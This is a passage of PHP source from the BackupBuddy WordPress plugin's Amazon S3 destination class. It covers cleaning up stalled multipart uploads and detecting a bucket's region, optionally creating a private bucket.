	if ($response->isOK()) {
		// Handle body - this _should_ create an array with elements [@attributes] which is itself
		// an array of attributes and [0] which should in this case be the "value" of the element or
		// may not be present if the element is empty (has no value)
		$response_body = (array) $response->body;

		// For US Standard region body would have empty value so no element [0] - but [@attributes]
		// element always present so array is not empty so that is not a valid test for no value
		( isset( $response_body[ 0 ] ) ) ? $response->body = $response_body[ 0 ] : $response->body = '' ;

		// Need to translate a returned region of EU into eu-west-1 because EU is not a region but
		// a location constraint but it seems that in some cases this is returned as a region value.
		( 'EU' === $response->body )? $response->body = 'eu-west-1' : false ;
	}
	return $response;
}



/* multipart_cleanup()
 *
 * S3 does NOT automatically clean up failed or expired multipart chunk files so clean up for them.
 *
 * @param array $settings Destination settings.
 * @param bool $lessLogs When true (default) suppress verbose per-upload logging.
 */
public static function multipart_cleanup( $settings, $lessLogs = true ) {
	$settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase.
	$max_age = 60*60*72; // Seconds of max age to allow a stalled multipart upload.
	require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' );
	pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Remote Housekeeping Starting ...' );
	$manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings );

	// Create S3 instance.
	pb_backupbuddy::status( 'details', 'Creating S3 instance.' );
	$s3 = new AmazonS3( $manage_data ); // the key, secret, token
	if ( $settings['ssl'] == 0 ) {
		@$s3->disable_ssl(true);
	}
	pb_backupbuddy::status( 'details', 'S3 instance created. Listing in progress multipart uploads ...' );

	// Verify bucket exists; create if not. Also set region to the region bucket exists in.
	// Note: $createBucket = false here — housekeeping must not create missing buckets.
	if ( false === self::_prepareBucketAndRegion( $s3, $settings, $createBucket = false ) ) {
		return false;
	}

	// Get the in progress multipart uploads
	$response = $s3->list_multipart_uploads( $settings['bucket'], array(
		//'prefix' => $settings['_multipart_remotefile'],
		'prefix' => 'backup',
	) );
	if(!$response->isOK()) {
		pb_backupbuddy::status( 'error', 'Error listing multipart uploads. Details: `' . print_r( $response, true ) . '`' );
		return;
	} else {
		if ( true !== $lessLogs ) {
			pb_backupbuddy::status( 'details', 'Multipart upload check retrieved. Found `' . count( $response->body->Upload ) . '` multipart uploads in progress / stalled. Details: `' . print_r( $response, true ) . '`' );
		} else {
			pb_backupbuddy::status( 'details', 'Multipart upload check retrieved. Found `' . count( $response->body->Upload ) . '` multipart uploads in progress / stalled. Old BackupBuddy parts will be cleaned up (if any found) ...' );
		}

		// Abort any BackupBuddy multipart upload older than $max_age.
		foreach( $response->body->Upload as $upload ) {
			if ( true !== $lessLogs ) {
				pb_backupbuddy::status( 'details', 'Checking upload: ' . print_r( $upload, true ) );
			}
			if ( FALSE !== stristr( $upload->Key, 'backup-' ) ) { // BackupBuddy backup file.
				$initiated = strtotime( $upload->Initiated );
				if ( true !== $lessLogs ) {
					pb_backupbuddy::status( 'details', 'BackupBuddy Multipart Chunked Upload(s) detected in progress. Age: `' . pb_backupbuddy::$format->time_ago( $initiated ) . '`.' );
				}
				if ( ( $initiated + $max_age ) < time() ) { // Older than the stall threshold; abort it.
					$abort_response = $s3->abort_multipart_upload( $settings['bucket'], $upload->Key, $upload->UploadId );
					if(!$abort_response->isOK()) { // abort fail.
						pb_backupbuddy::status( 'error', 'Stalled Amazon S3 Multipart Chunked abort of file `' . $upload->Key . '` with ID `' . $upload->UploadId . '` FAILED. Manually abort it.' );
					} else { // aborted.
						pb_backupbuddy::status( 'details', 'Stalled Amazon S3 Multipart Chunked Uploads ABORTED ID `' . $upload->UploadId . '` of age `' . pb_backupbuddy::$format->time_ago( $initiated ) . '`.' );
					}
				} else {
					if ( true !== $lessLogs ) {
						pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Chunked Uploads not aborted as not too old.' );
					}
				}
			}
		} // end foreach uploads.
	}

	pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Remote Housekeeping Finished.' );
	return true;
} // end multipart_cleanup().



/* _prepareBucketAndRegion()
 *
 * Validates bucket existence, creating if needed. Sets region for non-US usage.
 *
 * @param object &$s3 S3 object currently in use. Passed by reference so region can be set.
 * @param array $settings Destination settings array.
 * @param bool $createBucket Whether or not to create bucket if it does not currently exist.
 * @return bool true on all okay, false otherwise.
 *
 */
private static function _prepareBucketAndRegion( &$s3, $settings, $createBucket = true ) {

	// Get bucket region to determine if a bucket already exists.
	// Assume we will not have to try and create a bucket
	$maybe_create_bucket = false;
	pb_backupbuddy::status( 'details', 'Getting region for bucket: `' . $settings['bucket'] . "`."
);
	// ----- Continuation of _prepareBucketAndRegion(): detect region, set endpoint, optionally create bucket. -----
	$response = self::get_bucket_region( $s3, $settings['bucket'] );
	if( !$response->isOK() ) {
		$this_error = 'Bucket region could not be determined; bucket may not exist yet. Message details: `' . (string)$response->body->Message . '`.';
		pb_backupbuddy::status( 'details' , $this_error );
		// Assume we have to create the bucket
		$region = '';
		$maybe_create_bucket = true;
	} else {
		// Empty body means US Standard (us-east-1) per get_bucket_region()'s normalization above.
		pb_backupbuddy::status( 'details', 'Bucket exists in region: ' . (($response->body ==="") ? 'us-east-1' : $response->body ) );
		$region = $response->body; // Must leave as is for actual operational usage
	}

	// Set region context for later operations - note that if we are going to try and create
	// a bucket the region will have been set to empty so we'll get the bucket created in the
	// user-specified region.
	if ( '' == $region ) {
		// Bucket has no current region (ie it does not exist). Set user-specified region for new buckets.
		$s3->set_region( $settings['region'] );
	} else {
		$s3->set_region( 's3-' . $region . '.amazonaws.com' );
	}

	// Create bucket if it does not exist AND parameter passed to this function to create the bucket set to true.
	// Region/endpoint used based on user-defined setting.
	if ( ( true === $maybe_create_bucket ) && ( true === $createBucket ) ) {
		pb_backupbuddy::status( 'details', 'Attempting to create bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`).' );
		try {
			$response = $s3->create_bucket( $settings['bucket'], $settings['region'], AmazonS3::ACL_PRIVATE );
		} catch( Exception $e ) {
			$message = 'Exception while trying to create bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`). Details: `' . $e->getMessage() . '`.';
			pb_backupbuddy::status( 'error', $message );
			echo $message;
			return false;
		}
		if ( ! $response->isOK() ) { // Bucket creation FAILED.
			$message = 'Failure creating bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`). Message details: `' . (string)$response->body->Message . '`. ';
			if ( '' == $region ) {
				$message .= ' Note: Since the region could not be detected, if you are using IAM security, verify this resource ALLOWs the action "s3:GetBucketLocation". ';
			}
			pb_backupbuddy::status( 'error', $message );
			echo $message;
			return false;
		} else { // Send SUCCESS.
			if ( is_object( $response->body ) ) {
				$messageDetails = (string)$response->body->Message;
			} else {
				$messageDetails = '';
			}
			pb_backupbuddy::status( 'details', 'Success creating bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '`. Message details: `' . $messageDetails . '`.' );
			unset( $messageDetails );
		}
	} // end if create bucket.

	return true;
} // end _prepareBucketAndRegion().

} // End class.